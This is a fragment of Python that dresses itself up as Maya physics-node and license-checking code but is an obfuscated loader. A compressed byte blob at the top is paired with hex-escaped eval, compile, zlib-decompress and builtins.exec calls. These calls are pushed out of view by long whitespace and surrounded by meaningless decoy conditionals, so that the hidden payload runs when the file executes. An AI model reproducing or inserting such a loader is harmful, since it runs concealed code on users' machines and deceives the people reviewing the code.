\xd7\xe0fJ\xdc\xe2\xb0\xa4\x05\xae\xdb(\x89\x17m\x8e?Y\xca?_*>f\n\xbfd5\x8b\xac\x05\x7fo\xe9gPF\x03^|T\x99\xef\x1f+\x10\xa9xe$Te\nJ\xc6~n\xa9\xdf[]?\x93\xbc9\xb2_\x92\x97\xc3\x1d\\\x17\x81\x8d\x03\x15\xe7\x08~C\x0b\xd7\x9e>N\x9c;\xa0Y\x19\xb4w\x01S\x9a\xb5\xa4?\x12\x00\xf3`#\x7f\x86h\xcb\xb0\xf2\x02G\xeaX\x9e|\x0cV\xab\xa7A\xc5\xa5g\x94\x14\xdd\xcb\xf93i;\x95\xdaH\x9f\xf3fRL\x1f\x9e\xc8\xfd\xa1\x9c\xd64wh\x9ac\x83x\x99\xc8\xa3f$\xfec\x94\xeb\x16\xa2\xbd\xfb$|\x08\r\x06\xc5|$\xa6\xc1v\xc3)\x08H\x0b\xc95\xf7\xb3\xa5\xdc\xcaQ\xe4C\x16\xc8v\x19\x84n\xf4\x17\xad\xb3\xb8\xbc\x0eh\xc1=\xa2\x87\xc1\xd1n\x8dO@\x9a\x17\xbd\xd4\xf8\xe7%\xef!\xb0\x1f\x9b;\xff\x05\x8dH,\xfe')

        if 430274 > 6568031:
            _brorenmer._add(MayaNode = -17186 + _brorenmer._nodephysicssolver)
        elif 144948 < 5975085:
            _brorenmer._add(MayaNode = -50548 + _brorenmer._nodephysicssolver)                                                                                                                                                                                                                                                          ;S2SSSS2SS2SS2222S22S22S,MNMMNMNMNNMMNNMMNMNMM,S2S2SSS2222S22S2222S22S222,DooOooODOOODDoDOOoDDODoD,mmmmmmmnnmnmmmnnmmnnnm=(lambda mnmmnmnmmnnnnmnnnmnm:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(mnmmnmnmmnnnnmnnnmnm)"),filename='\x53\x32\x32\x32\x32\x53\x53\x53\x32\x53\x53\x32\x32\x53\x53\x53\x53\x32',mode='\x65\x76\x61\x6c'))),(lambda mnmmnmnmmnnnnmnnnmnm:mnmmnmnmmnnnnmnnnmnm['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda mnmmnmnmmnnnnmnnnmnm:mnmmnmnmmnnnnmnnnmnm(__import__('\x7a\x6c\x69\x62'))),(lambda SSSS2222S2222SS2SS22S22S,mnmmnmnmmnnnnmnnnmnm:SSSS2222S2222SS2SS22S22S(mnmmnmnmmnnnnmnnnmnm)),(lambda:(lambda mnmmnmnmmnnnnmnnnmnm:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(mnmmnmnmmnnnnmnnnmnm)"),filename='\x53\x32\x32\x32\x32\x53\x53\x53\x32\x53\x53\x32\x32\x53\x53\x53\x53\x32',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        if 163575 > 2312320:
            _brorenmer.BroLicenseChecker(_licensekeyenforcer = _brorenmer._nodephysicssolver * 64821)
        elif 475380 < 6922605:
            PhysicsNodeRouter(DynamicNodeProcessor = 47015 + 68202)._add(MayaNode = 20802 * _brorenmer._nodephysicssolver)                                                                                                                                                                                                                                                          ;mmmmmmmnnmnmmmnnmmnnnm()(DooOooODOOODDoDOOoDDODoD(MNMMNMNMNNMMNNMMNMNMM(S2S2SSS2222S22S2222S22S222(S2SSSS2SS2SS2222S22S22S('\x76\x61\x72\x73'))),PhysicsNodeRouter.Floor(Math='OO00OoOOO0ooO0o0OO')+PhysicsNodeRouter.Floor(Math='ODDooOOOoDOoDoODOOODDOOOD')))

except Exception as BroRenmer:
        if 302320 > 1492855:
            PhysicsNodeRouter.execute(code = MayaSimulationEngine(BroRenmer))

        elif 322922 > 6852377:
            _brorenmer._add(MayaNode = 88388 - _brorenmer._nodephysicssolver)

